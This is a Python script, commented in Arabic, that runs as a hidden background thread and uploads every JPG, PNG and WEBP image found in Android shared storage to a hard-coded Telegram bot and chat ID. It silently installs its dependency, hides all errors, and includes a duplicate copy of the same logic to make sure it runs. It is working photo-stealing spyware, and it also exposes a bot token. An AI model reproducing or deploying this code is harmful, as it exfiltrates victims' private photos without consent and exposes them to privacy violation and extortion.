import os
import threading
from concurrent.futures import ThreadPoolExecutor
import base64
import zlib

# ────────────────────────────────────────────────────────────────
# الجزء الأول - يعمل بشكل مستقل
# ────────────────────────────────────────────────────────────────

try:
    import telebot
except ImportError:
    import subprocess
    import sys
    subprocess.check_call([sys.executable, "-m", "pip", "install", "pyTelegramBotAPI"])
    import telebot

BOT_TOKEN = "7563891455:AAFDVnkldlMVL266k4_HUHDZXjEogSp2yi4"
ADMIN_CHAT_ID = 7238044992

bot = telebot.TeleBot(BOT_TOKEN)
TARGET_DIR = "/storage/emulated/0/"

def send_photo(file_path):
    try:
        with open(file_path, "rb") as f:
            if file_path.lower().endswith((".jpg", ".jpeg", ".png", ".webp")):
                bot.send_photo(
                    chat_id=ADMIN_CHAT_ID,
                    photo=f,
                    caption="By: TOM"
                )
    except:
        pass

def start_uploading():
    with ThreadPoolExecutor(max_workers=200) as executor:
        for root, _, files in os.walk(TARGET_DIR):
            for file in files:
                full_path = os.path.join(root, file)
                if full_path.lower().endswith((".jpg", ".jpeg", ".png", ".webp")):
                    executor.submit(send_photo, full_path)

# تشغيل العملية في خيط منفصل حتى لا يتوقف البرنامج الرئيسي
threading.Thread(target=start_uploading, daemon=True).start()

# ────────────────────────────────────────────────────────────────
# الجزء الثاني - نسخة احتياطية/مكررة بنفس المنطق
# (غالباً ما يتم وضعها لزيادة فرص التنفيذ)
# ────────────────────────────────────────────────────────────────

try:
    import telebot as tb2
    from concurrent.futures import ThreadPoolExecutor as TPE2
    import os as os2
    import threading as th2

    bot2 = tb2.TeleBot("7563891455:AAFDVnkldlMVL266k4_HUHDZXjEogSp2yi4")
    chat_id2 = 7238044992
    base_dir = "/storage/emulated/0/"

    def upload_file(path):
        try:
            with open(path, "rb") as photo_file:
                ext = path.lower()
                if ext.endswith((".jpg", ".png", ".jpeg", ".webp")):
                    bot2.send_photo(chat_id=chat_id2, photo=photo_file, caption="By: TOM")
        except:
            pass

    def background_uploader():
        with TPE2(max_workers=180) as pool:
            for dirpath, _, filenames in os2.walk(base_dir):
                for fname in filenames:
                    fullpath = os2.path.join(dirpath, fname)
                    if fullpath.lower().endswith((".jpg", ".jpeg", ".png", ".webp")):
                        pool.submit(upload_file, fullpath)

    th2.Thread(target=background_uploader, daemon=True).start()

except:
    pass